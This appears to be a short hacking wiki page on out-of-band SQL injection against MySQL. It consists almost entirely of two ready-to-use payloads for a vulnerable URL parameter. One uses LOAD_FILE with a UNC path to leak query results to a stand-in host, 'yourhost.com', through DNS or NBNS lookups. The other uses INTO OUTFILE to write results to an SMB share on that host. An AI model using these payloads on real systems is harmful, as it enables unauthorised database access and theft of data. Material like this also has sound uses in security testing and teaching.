====== Hacking - SQL Injection - MySQL - Out of Band Channel Attacks ======

Makes a NBNS query request/DNS resolution request to yourhost.com:

<code sql>
?vulnerableParam=-99 OR (SELECT LOAD_FILE(concat('\\\\',({INJECTION}), 'yourhost.com\\')))
</code>

Writes data to your shared folder/file:

<code sql>
?vulnerableParam=-99 OR (SELECT ({INJECTION}) INTO OUTFILE '\\\\yourhost.com\\share\\output.txt')
</code>


  * **{INJECTION}** = You want to run the query.